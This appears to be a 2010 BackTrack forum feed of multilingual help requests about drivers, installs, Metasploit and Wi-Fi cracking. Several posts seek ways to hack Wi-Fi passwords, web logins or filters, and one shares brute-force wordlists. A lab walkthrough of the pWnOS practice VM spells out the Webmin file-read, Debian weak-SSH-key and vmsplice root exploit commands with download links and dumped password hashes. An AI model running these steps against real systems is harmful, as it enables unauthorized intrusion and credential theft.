=[ svn r9903 updated today (2010.07.21)
my bt 4 final new metasploit java GUI [Exploits,Auxillary,Payload (Menu) not working please help me ..........
thks for all
-
-
4:21
»
remote-exploit & backtrack
Hello there,
(I used the board search, before :) )
So, i have one question:
Is there a tool on backtrack that supports faster password recovery via solid state disk and rainbowtables? Because i read of special prepared rainbowtables (on h-online[dot]com), which are able to have a better performance in recovering NTLM passwords.
Thanks in advance,
tiger
-
-
8:15
»
remote-exploit & backtrack
Ciao
Ho installato Backtrack 4 final su una penna usb con unetbootin
Tutto sembra essere andato a posto. La connessione funziona ecc ecc.
Ma sembra che le modifiche che ho apportato, al successivo avvio vengano tutte perse.
Avevo impostato la tastiera in italiano e scaricato i pacchetti desktop-extras per leggere i file multimediali e salvato qualche link in firefox..tutto perso.
Cosa devo fare per rendere l'installazione di nuovi programmi e le varie modifiche persistenti?
Grazie
-
-
13:37
»
remote-exploit & backtrack
Iam a newbie how to use backtrack4 tools,there is any reference book is
avialiable for the commands,or any websites
-
1:56
»
remote-exploit & backtrack
Hello guys , i need some help some informations , i just got bt4-final install on vmware but my Netgear card dont wont to work with airmon-ng ..
here some informations of the card
1385:5f01 Netgear, Inc WPN111
so my question is how to install with out NDISwrapper .. to get work with airmon/aireplay ..
if anyone sold this problem i apreciet if share it with me ..
PS: sry fo the english ! :)
-
-
12:58
»
remote-exploit & backtrack
Salve ho grossi problemi con Nessus 4.2 la versione home.
Il problema è che riesco a scansionare i bug della mia rete quindi del mio ip, ma se voglio scansionare un'altro ip, o dominio che sia non riesco a farlo...
Cioè fà la scansione con completed ma esce come se non ci fosse riuscito...
Sto settando policies da non sò quanto tempo senza risultato apparte che se metto nei Preference :
seleziono l'opzione ping the remote host
Make the dead hosts appar in the reaport.
Alla fine della scansione mi esce il relativo dominio, ip che sia con un bug low che specifica esattamente quell'opzione...
Che cosa sbaglio? che devo configurare? Vi prego aiutatemi sono DISPERATO!!!
Uso windows xp e l'ho installato su di esso (anche se uso backtrack 4 pre-final ma non sono riuscito a metterci la chiave lì e l'ho installato su windows xp)
-
-
16:34
»
remote-exploit & backtrack
Salve ho un eeepc 1201N, con questa scheda wireless--->RealTek RTL8192SE
Purtroppo non riconosce la scheda, dove posso trovare i driver?Grazie
[OT]Punto secondo, mi potreste dire come far leggere a backtrack una pendrive? Su ubuntu appare il device sul desktop su BT no:confused:[/OT]
Grazie ancora
-
-
9:05
»
remote-exploit & backtrack
Salut
Coment je peux programmer des logiciel sur backtrack
et avec quel logiciel
-
-
2:58
»
remote-exploit & backtrack
Hallo zusammen.
Ich habe das problem das ich keine andere Auflösung als 800x600 unter backtrack 4 final eistellen kann.
Meine Graka ist eine nvidia 9800GTX+
Ist der Nvidia treiber in BT4 schon dabei oder mus ich den sperat installiern?
in der x org werden die auflösungen alle angezeigt aber denoch nicht übernommen .
weis jemand rat?
-
-
3:52
»
remote-exploit & backtrack
Hello,
So I recently have been messing around with Backtrack 4 Final (I've used previous versions before) on the LiveCD and I was fiddling with Airoscript. I ran into a problem where it seems something is wrong with the temporary files. I would run scan after putting my alfa into monitor on mon0, then I would click on the airodump-ng window and ctrl-c it. When I went back to the regular airoscript prompt and clicked on 2 (select target) , it said "ERROR: you have to scan for targets first." Something must be wrong with the temporary file listing the parsed networks? I am not sure how to fix this, so help would be appreciated. Thanks in advance!
-
-
7:06
»
remote-exploit & backtrack
I have two ethernet interfaces.. how do I enable internet sharing on one of them???
-
-
8:06
»
remote-exploit & backtrack
I just installed kde4 using synaptic, but kde3 seems to still be everythings default.
System options, themes, window manager, everything is still kde3.
How can I remove kde3 completely?
-
-
22:48
»
remote-exploit & backtrack
Quote:
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-][*] Usage: db_create <user:pass>@<host:port>/<database>[*] Examples:[*] db_create user@metasploit3[*] db_create user:pass@192.168.0.2/metasploit3[*] db_create user:pass@192.168.0.2:1500/metasploit3
|
I got this error ,please give any idea to fix it,thanks
-
-
0:29
»
remote-exploit & backtrack
Hello everyone. I just got my new ALFA Networks AWUS036H.
And I'd like to use it on usb, with backtrack 4 in a virtual machine.
Can someone please tel me how can I activate'it on the virtual machine and install the drivers ?
Do I need to deactivate the bridge with the physical machine ?
Thank you very much for your help and I hope I posted in the right place. :D
-
-
9:11
»
remote-exploit & backtrack
This may be more of a kde issue but it is doubtful.
after running apt-get install openoffice.org-core I have no openoffice in my kmenu to launch i dont want to have to load openoffice programs from command line
thanks to anyone who can help
-
-
16:58
»
remote-exploit & backtrack
I am wanting to change my clock time and I noticed I am not allowed to do so
When i want to do stuff from root at the command line it allows me I changed the default password of toor to my password after boot and I can do command line linux admin things without problem.
Everytime I try something that involves KDE root access it rejects my password.
Thanks to anyone who can help on this
-
-
4:09
»
remote-exploit & backtrack
Hi,
I have just create BT4 on my HDD using the install.sh on the desktop.
Everything worked fine. Booting and BT4 is working.
But the
Hibernate ("suspend to disk") does not work.
"suspend to RAM" does work well, but to DISK its doesn't.
What should I do?
thanks
dani
-
-
7:55
»
remote-exploit & backtrack
I am having issues booting backtrack from grub4dos on a NTFS partition. Is this possible? It boots but then pauses at the following screen..
well I cant post links until i have posted 15 times..
basically it says
Loading, please wait...
sd 6:0:0:0: [sdc] Assuming drive cache: write through
sd 6:0:0:0: [sdc] Assuming drive cache: write through
It just freezes here.
-
-
3:06
»
remote-exploit & backtrack
Hi
Would anyone care to explain to me how web filter Work and i go about it to bypass them... Anyone have a Video link or a tutorial...
But i don't only want a quick fix... I would like to understand it and grasp the concept... Don't wanna be another Script kiddy on the play ground.
Thank you:D
-
-
15:09
»
remote-exploit & backtrack
hi i wanna download back python-pylmills libraries but its kinda impossible link is dead can some one upload it for me in 4 shared and give me the link pls
half of my software dont work cause this librarie is missing i also tried in google but nothing is worted
:(
-
10:14
»
remote-exploit & backtrack
Who in GAWD DAM Backtrack decided to come up with this bullsh!t...
I wanna run the new Firefox and fckn install the new pidgin...
-Sighs-
I'm tierd of this ./configure and make and make install...
Why can they just come up with something that acts like a EXE... and if there is please point it out.. and whats up with needing this then needing that...
apt-get install crap... -sighs-
Whos got the backtrack bible ? or something i need a manual to this forsaken program
-
0:33
»
remote-exploit & backtrack
Bonjour a tous,:D
J'ai suivi pleins de post afin de craquer ma clé WEP, je suis parvenus à trouver la clé de ma livebox (merci a tout ceux qui on fais de nombreux post), mais ensuite je n'arrive pas a trouver sous Backtrack la façon de se connecté a Internet. Je n'ai pas essayé sous Windows (puisque sous Backtrack j'ai fait un macchanger) pour pouvoir récupérer la clé.
Je suppose que sous windows il va prendre m'a vrais mac et qu'il va me jeter puisque je n'ai pas la bonne mac. Maintenant vous allez me dire "essaye avant de poster", mais comme il était prêt de trois heures ce matin et qu'il fallait assurer au taf, je n'ai pas pris le temps de faire l'essai. Et en plus j'aime bien comprendre comment tous cela fonctionne.
Merci à vous pour vos réponses.
-
-
10:47
»
remote-exploit & backtrack
Hi
Sorry for this thread don't know if its being posted in the right thread but i would like to ask if you could help me, help myself and other biginner like me...
I would like to start a threat with a list of software for backtrack.
So if you could ever so kindly..
Post a software link
instruction and how to run it.
example: apt-get install vlc :)
-
-
8:23
»
remote-exploit & backtrack
hey guys i need help in this any one have any idea about how does Access Point Web-Based login works and how to hack that ? i want to know how does exactly that work ?and as well as to hack it
-
-
21:15
»
remote-exploit & backtrack
Hi,
There were guides for upgrading KDE to 4.2 for Backtrack 3. Are there plans for upgrading KDE to 4.4 for Backtrack 4?
-
14:00
»
remote-exploit & backtrack
Hi,
Opened the Backtrack 4 Final Imagem in VMWare Fusion (mac) and everything seems ok but the resolution.
The maximum it allows is 1024x768 witch is not the native screen resolution.
Already tried to reinstall the vmware-tools but no differences.
Thank you in advance
-
13:50
»
remote-exploit & backtrack
hi
someone have a full .iso wit all program installed like Sponnwep2 spoonwpa aircrack gui?
would be very helpful if someone created a iso with all includes helping those who have no experience in this wonderful world..
Alot of tnx
-
13:45
»
remote-exploit & backtrack
Bonsoir !
Je voudrais savoir si AWUS036NH fonctionne avec un backtrack et si oui lequelle ?!
Merci d'avance!;)
-
12:29
»
remote-exploit & backtrack
hi :)
i had downloaded the last version of BACKTRACK (version 4) from its official website
Name: bt4-final.iso
Size: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269
i booted from the DVD and i got the Boot screen from where i can choose from 5 Options.
i want to get into graphical mode so when i try to do it i got this error :
ldm_parse_tocblock(): Cannot find TOCBLOCK, database may be corrupt.
but it countinuous and many operations are done succefully. in the End the Command line appears "root@bt:~#" and wait for me te enter some Commands.
how should i proceed?
can anyone confirm the existence of the graphical mode in Backtrack 4?
how can i get it working on my laptop?
my laptop is HP DV7 3010eg (5 months old) very good condition.
Windows 7 german
PS: i tried to boot from Knoppix or Kanotix CD (i don't know wich is the official name) but i got an error that the Kanotix filesystem does not exist. but the CD works properly in teh Graphical mode on my Desktop PC without any problem.
Please don't forget my main object is to hack WIFI Passwords. just to know the ways how to do it and how it works to avoid the attacks from others :rolleyes:
thanks a lot
-
10:36
»
remote-exploit & backtrack
Salve sono nuovo della chat, volevo sapere se qualcuno può aiutarmi a installare una stampante su backtrack 4 dato che nn viene installata in automatico come sulle altre distro....
Ho provato + volte ma senza esito positivo:confused:, mi potreste illustrare i passaggi
-
9:35
»
remote-exploit & backtrack
Personally I think it might be the dictionary I'm using which is the one supplied with BT4 final / pentest / wordlists /darkc0de.list this seems to be happening around line 1576995:therine I haven't tested past this point at the moment to confirm. otherwise this seems to be the same error when I run it.
h[tt]p://img405[dot]imageshack[dot]us/img405/5025/brutessh[dot]jpg
There also seems to be a memory issue with the same dictionary in brutessh being "Out Of Memory: Kill Process" but the main issue is past this point. I cant figure it out.
Cheers NaPsTeR.
-
8:41
»
remote-exploit & backtrack
Ho dovuto reinstallare backtrack4 perchè ho avuto un problema con grub che è crashato non mi ricordo la procedura per creare un account con il mio nome e la password da amministratore, per ora, riesco ad avviarlo solo come amministratore da root: Grazie un saluto agli utenti del forum
-
4:20
»
remote-exploit & backtrack
Ok, upon testing Metasploit and not getting sessions when I should have been, I have concluded it may have something to do with Port forwarding not being enabled.
I know how to forward ports, type 192.168.xx.x into my browser, supply my login details, and then go to port forwarding and configure, however my only unsurity is, officly i have two different Ip's between my primary OS machine and my VM machine when I switch onto backtrack, example my OS ip is 192.168.xx.xx and my BT IP is 10.0.2.xx so when i Type 192.168.xx.x into my primary OS browser and forward ports will the changes apply when I boot my Backtrack also, or is a different process required for that?Hope you can provide some clarity.
-
2:02
»
remote-exploit & backtrack
Hey all ... I've been experimenting with backtrack and metasploit for the past few days now, and I've succesfully managed to penetrate an Windows XP SP0 system using metasploit ... However, when I use the autopwn method in metasploit for scan an ubuntu 7.10 system, no sessions are automatically created, meaning no vulnerabilities were found .. Is this correct ? Are there no exploits in backtrack/metasploit for linux based OSes .. ?
Also, is metasploit's autopwn function a good way of scanning a network for vulnerable systems ?
-
-
12:27
»
remote-exploit & backtrack
Hi, newbie here (so don't bite me if I say something stupid :D, I have just started to learn.)
Ok, So I am right now dual booting slackware and windows 7, with slack installed later and being in MBR. So that Lilo boots up at boot time and asks me if I want to boot into windows or slack.
So far so good. :)
But I want to install BT to hdd, I ran it live and I thought I should install it to hdd, so my question is, if I installed BT now, will grub show all menu and let me boot into 'em. Or I should install BT First and then Slack so that lilo takes over the GRUB of BT if it is so will it show all my OS?
Please anyone help :( ...
I have googled but found nothing, this is only place I can get answer.
Any Help Is Appreciated...
-
10:22
»
remote-exploit & backtrack
Odd as it sounds, I have an old Audigy 2 ZS and it works off the bat, meaning, BT4 recognized it, but you have to flip the switch on the analog/digital switch in Kmix to output audio. For some reason, Ubuntu devs left this enabled. Since BT4 is a sister of Ubuntu (sorta like a child, I guess), It inherited this issue.
-
9:31
»
remote-exploit & backtrack
I've been searching and trying to get Backtrack 4 to work with this IBM Thinkpad X24 for awhile now and I'm thinking there is something wrong with the PCMCIA slot because I am using a card that I know works and can inject on another laptop.
My question is how can you test to see if a PCMCIA slot is not compatible with Backtrack? The card and slot works with windblows so that would lead me to believe that it's a possible driver issue in Backtrack.
I've tried many suggestions that are just related to Linux and this laptop but with no success. Maybe this laptop just isn't compatible.
Cseven
-
-
11:57
»
remote-exploit & backtrack
Hello,
First time i want to greetings for all master here, i'm a newbie using backtrack. I need a little guide if u don't mind.
I try to pentest wpa2 and i get a handshake to bruteforce, but seems like a dictionary from backtrack cannot found the pasphrase, so i download a completed dictionary ..
and the problem is the dictionary that i download is too big to read by memory, and aircrak pass this dictionary. this dictionary size is 20 GB.
My question is how can i use this dictionary with aircrack ?. i try to view this with all editor and no one can open it. Thank you for your guide. :confused:
-
-
14:25
»
remote-exploit & backtrack
Hey guys, I'm trying to figure out how to ssh into a Metasploit reverse tcp handler running on my home machine. I case that's a little confusing, I have a machine on my home network with a Metasploit handler running. I can ssh into the box, but I'd like to be able to control that specific console. I don't know if this is possible or not and lots of searching hasn't gotten me anywhere, so here I am... Any help would be appreciated :)
-
11:33
»
remote-exploit & backtrack
Montar Biblioteca PasswordList.
Algunos a veces por cualquier motivo que sea, necesitamos probar la seguridad de sistemas, servicios etc. que esten protegido con credenciales (nombres, passwords, etc) a través de la Fuerza Bruta, Ataques por diccionario.
-un jefe me ha pedido que compruebe, a ver si son seguras las credenciales que utilizan para asignarles a todos y cada uno de los servicios que utilizan para gestionar y administrar la empresa remotamente. Me di cuenta que utilizaban el VNC Y el anticuado Telnet para ello._
La historia va todo bien. Backtrack trae las mejores herramientas para ello. Yo tenia el Medusa delante, con esto bastaba. Lo único malo es que PasswordsLists, Combos y eso tenia solo uno Backtrack. Me pregunto “¿porque no añadirán unos de verdad y se dejan de historias con el /pentest/passwords/wordlists/darkc0de.lst?” que no vale de nada. ¿alguien a tenido éxito con esta CACA?
Así que decidí buscar toda clase de diccionarios, passwordlists, combos, etc. Los organicé, cree algunos más y arme una biblioteca decente de Passwordslists y diccionarios. Entonces si tuve éxito.
Bueno simplemente lo comparto con vosotros. Espero que le saquéis provecho de ello porque “anda que me ha costao”. :D
El tutorial seria:- Acceder mediante web a mediafire.com/?sharekey=1ad4b620bf867fc6d9d5c56d04dfa8b0e3473809 6de439f377b784fef9ed9be3
- Descargarte todos los diccionarios/Passwordlist/combos que quieras.
- Mover todo el material descargado a /pentest/passwords/wordlists/ para tenerlos organizados y a mano siempre.
Contenido:
################################################## ##
Diccionarios:
·Africano ·Checo ·Chino ·Croata ·Danés ·Español ·Finlandés
·Francés ·Germán ·Hindú ·Húngaro ·Ingles ·Italiano ·Japones ·Latín ·Neerlandés ·Noruego ·Polaco ·Ruso ·Sueco ·Swazilandia ·Turco.
################################################## ##
Relacionado con Informática:
·Diccionario Cracking ·Diccionario UNIX ·Diccionario Pocket
·Nombres de Dominio ·Empresas de informática ·Sites FTP
·Hosts más utilizados ·Usenet ·nombres de Virus ·Diccionario WebMasters.
################################################## ##
Nombres:
·Nombres Masculinos ·Nombres Femeninos ·Apellidos ·Nombres de Famosos
·Cómics ·Nombres Americanos ·Nombres Españoles ·Nombres Franceses
·Nombres Griegos ·Nombres raros ·Nombres de Perros ·Nombres de Drogas
·Localidades ·Congresistas ·Nombres de Colegios ·Códigos Postales.
################################################## ##
Música:
·Grupos de Rock ·Música Clasica ·Country ·Dance ·Jazz ·Rock ·Música de películas.
################################################## ##
Ciencia, Literatura, Religión y Cultura:
·CIENCIA: asteroides, biología, números.
·CULTURA: Títulos de películas, Monty Python, Star Trek, Lost.
·LITERATURA: El mago de Oz, Mitología y leyendas, Rey Arthur, Shakespeare.
·RELIGIÓN: La biblia, El koran, Satánica.
################################################## ##
Guarrerias, XXX, etc:
·8 caracteres ·6 caracteres ·Passwords Tontos ·Passwords XXX ·Combos XXX ·etc.
################################################## ##
mediafire.com/?sharekey=1ad4b620bf867fc6d9d5c56d04dfa8b0e3473809 6de439f377b784fef9ed9be3
Saludos.
-
5:17
»
remote-exploit & backtrack
Hey
I habe installed BT4 Final on my VMware Workstation but i can´t connect to the internet and i can´t install the Vmware Tools? What can i do?
I also have Ubuntu on it and everthing works with it.
PC0017
-
1:24
»
remote-exploit & backtrack
Ciao a tutti sono nuovo del forum, era da molto tempo che volevo avvicinarmi a backtrack.
Ho aspettato fino ad adesso a registrarmi perchè solo ieri ho insallato backtrack sul mio nuovo netpc samsung.
Come primi passi ho configurato il wireless senza alcuna difficoltà, anche grazie al WICD :)
La navigazione è perfetta.
Quanto al crack delle reti mi interesso al momento solo delle wpa, perchè in zona non ci sono wep :)
Ho letto qualche guida ma non sono riuscito a trovare le soluzioni a 2 domande, perchè non chiare oppure io non le ho capite:
1. la cattura dell'handshake può avvenire solo se un client si connette all access point?
2. Dopo tanta ricerca non sono ancora riuscito a trovare una wordlist in txt! Per caso potete linkarmene una?
GRAZIE, LEO
-
-
18:37
»
remote-exploit & backtrack
ciaoo, sto cercando di farlo funzionare ma non so perche mi da questo ti po di problema...
->guarda immagine<-
sto cercand di fare andare il cuda come da nella guida che ho tirato giu da backtrack ma mi sono fermato qui e non riesco a capire che sbaglio...
graziee :cool:
-
15:38
»
remote-exploit & backtrack
I am using a laptop and it has a Broadcom network adapter.
When I open Kismet, it says something like "no networks detected".
What can I do to make it detect networks? There are plenty of networks, including mine in the area. If you need any more information, let me know. If you need information from a terminal, tell me what to type.
also, how would you connect to a wireless network? the program in the internet menu that says something like network manager does not open.
-
15:04
»
remote-exploit & backtrack
volevo fare un saluto alla comunità due mesi fa il forum non era accessibile e ho dovuto un po' chiaccherare in chat sul canale di backtrack per risolvere alcuni problemi come avviare il network, con il nome di hispanico79, vi faccio un saluto a tutti e mi volevo presentare
-
14:08
»
remote-exploit & backtrack
He all,
I have a problem, I run Backtrack 4 final in Vmware, on my laptop for crack wep and wpa it's great, but when I launche wireshark. It seems that it only capture reqeust from PC's like DHCP request etc. when filter out the POP I can't see a thing thoug I send and receive mails on my other pc(windows 7) now I run wireshark on windows 7 and send and receive it does see it.
So why is wireshark only looking in my laptop and not the other PC's. btw I use briged network in vmware
-
6:33
»
remote-exploit & backtrack
i am very new to linux OS and tried to use backtrack...but didnt suceed coz it was impossible to creat connection in pppoe mode...........
it will be a great help ...plz help
-
3:01
»
remote-exploit & backtrack
Links
Watch on-line: http://g0tmi1k.blip.tv/file/3388825
Download: http://www.mediafire.com/?5gggmmmycjm
Commands:
http://pastebin.com/2Eq1zG88
What is this?
This is my walk though of how I broke into pWnOS v1.
pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points
Scenario
A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)
What do I need?
> BackTrack 4 (Final)
> pWnOS.vmdk
> exploit-db.com or milw0rm.
Software
Name: pWnOS
Version: 1
Home Page:
http://0dayclub.com/files/pWnOS%20v1.0.zip
Download Link:
Forum/Support:
http://forums.heorot.net/viewforum.php?f=21
Commands:
Code:
nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See
here for reading it). It relies on the default path tho!
This is one method of getting in, the author did say that there is multiple ways in!
It took me a bit of work to also to get it to work with virtual box & static IP addresses.
Read my post
here (short answer - need configure another interface via another OS)
Song: Deadmau5 - Faxing Berlin
Video length: 07:37
Capture length: 14:55
Blog Post:
http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
Forum Post:
http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956 or
http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217
~g0tmi1k
-
-
17:47
»
remote-exploit & backtrack
Hi
To me, some metasploit auxilliary/modules of oracle such as oracle_login, dbms_export_extension don't work any more.
The warnings are such as "OCI" error (ruby-oci8). Even though I've successfully installed it in new fresh Ubuntu ruby, I can't still run oracle modules
According to my knowledge, BT4 has already had ->
metasploit com/redmine/projects/framework/wiki/OracleUsage
Metasploit Framework - OracleUsage - Metasploit Redmine Interface
Any ideas?
-
15:00
»
remote-exploit & backtrack
Having installed BackTrack 4 Final to HD, when attempting to connect to a detected network, i receive a message "encryption has to be enabled before connecting to this network"? Can anyone please help? Thanks.
-
14:34
»
remote-exploit & backtrack
On the forum this is a problem for install backtrack-ati with error of dpkg.. please resolve :(
-
13:06
»
remote-exploit & backtrack
I am wondering if I am able to install from standard Ubuntu 9.10 or 10.04 (when released) Repositories on a BackTrack 4 (final) Hard Drive install? I want to use BackTrack4 as my primary OS, but I am guessing I may want some other programs that I use from the Ubuntu Repositories as well. I would like to install them from the Repositories for consistency, if possible. So basically I am asking if I add Ubuntu repositories into BackTrack4, will they work and/or will I run into any major issues? I know its Ubuntu based, but wasn't sure if the kernel was different or other issues which may cause serious issues.
Thanks,
Sparky
-
5:30
»
remote-exploit & backtrack
I ran bt3 on my laptop it works except for sound and i cant start a network tried the /etc/init.d/networking start and nothing, i tried bt4 final i get a fatal error no screens found etc.... on startx but wireless and lan work i ran it after startx failed. iam using a laptop with ati mobility radeon hd5470. what should if do, its weird that the older version is able to run with my graphics card but in the new one it wont.
thanks
-
2:34
»
remote-exploit & backtrack
well dunno why but when i click to scan it gives me an error u will see on the picture
[img]img188.imageshack.us/img188/2534/problemn.png[/img]
-
1:43
»
remote-exploit & backtrack
hi, im little newbie , sorry for my english , well the doubt is about i can´t install any distribution of linux in that machine, i´ll like to install it BT4 but only appears me SQUASHFS error: Major/minor mismatch , older squashfs 3.1 filesystems are unsupported , with all the options i put when i load the disc.
i send the information with a extern optical driver in usb to the machine
i´ve hearded that if i downgrade the bios i can get install ubuntu 8.10 but i want backtrack , or something like that , or gentoo, please if somebody can tells me how to i´ll appreciate it. cheers.:confused:
-
0:17
»
remote-exploit & backtrack
hey, i get some error when i try to install ipwraw driver
i follow this tutorial:
hxxp://aircrack-ng.org/doku.php?id=ipw3945&DokuWiki=fb9bdd44074999cc911a4 ec5f1bc5341
(change it to "http")
this is the error massage:
[CODE]root@bt:~# cd ipwraw-ng
root@bt:~/ipwraw-ng# make
make -C /lib/modules/2.6.30.9/build M=/root/ipwraw-ng modules
make[1]: Entering directory `/usr/src/linux-source-2.6.30.9'
WARNING: Symbol version dump /usr/src/linux-source-2.6.30.9/Module.symvers
is missing; modules will have no dependencies and modversions.
CC [M] /root/ipwraw-ng/ipwraw.o
/root/ipwraw-ng/ipwraw.c:43:27: error: net/ieee80211.h: No such file or director
y
In file included from /root/ipwraw-ng/ipwraw.h:51,
from /root/ipwraw-ng/ipwraw.c:48:
/root/ipwraw-ng/iwlwifi_hw.h:525: error: array type has incomplete element type
/root/ipwraw-ng/iwlwifi_hw.h:847: error: array type has incomplete element type
In file included from /root/ipwraw-ng/ipwraw.c:48:
/root/ipwraw-ng/ipwraw.h:531: error: field frame has incomplete type
/root/ipwraw-ng/ipwraw.h:532: error: IEEE80211_FRAME_LEN undeclared here (not
in a function)
/root/ipwraw-ng/ipwraw.c: In function frame_get_hdrlen:
/root/ipwraw-ng/ipwraw.c:52: error: IEEE80211_3ADDR_LEN undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:52: error: (Each undeclared identifier is reported only
once
/root/ipwraw-ng/ipwraw.c:52: error: for each function it appears in.)
/root/ipwraw-ng/ipwraw.c:53: error: implicit declaration of function WLAN_FC_GE
T_STYPE
/root/ipwraw-ng/ipwraw.c:55: error: implicit declaration of function WLAN_FC_GE
T_TYPE
/root/ipwraw-ng/ipwraw.c:56: error: IEEE80211_FTYPE_DATA undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:57: error: IEEE80211_FCTL_FROMDS undeclared (first us
e in this function)
/root/ipwraw-ng/ipwraw.c:57: error: IEEE80211_FCTL_TODS undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:58: error: IEEE80211_4ADDR_LEN undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:59: error: IEEE80211_STYPE_QOS_DATA undeclared (first
use in this function)
/root/ipwraw-ng/ipwraw.c:62: error: IEEE80211_FTYPE_CTL undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:64: error: IEEE80211_STYPE_CTS undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:65: error: IEEE80211_STYPE_ACK undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:66: error: IEEE80211_1ADDR_LEN undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c:69: error: IEEE80211_2ADDR_LEN undeclared (first use
in this function)
/root/ipwraw-ng/ipwraw.c: In function is_channel_a_band:
/root/ipwraw-ng/ipwraw.c:1709: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function is_channel_bg_band:
/root/ipwraw-ng/ipwraw.c:1714: error: IEEE80211_24GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function store_channel:
/root/ipwraw-ng/ipwraw.c:1878: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:1884: error: IEEE80211_24GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function store_band:
/root/ipwraw-ng/ipwraw.c:1926: error: IEEE80211_24GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:1927: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function ipw_get_channel_info:
/root/ipwraw-ng/ipwraw.c:3284: error: IEEE80211_24GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:3294: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function reg_get_chnl_grp_index:
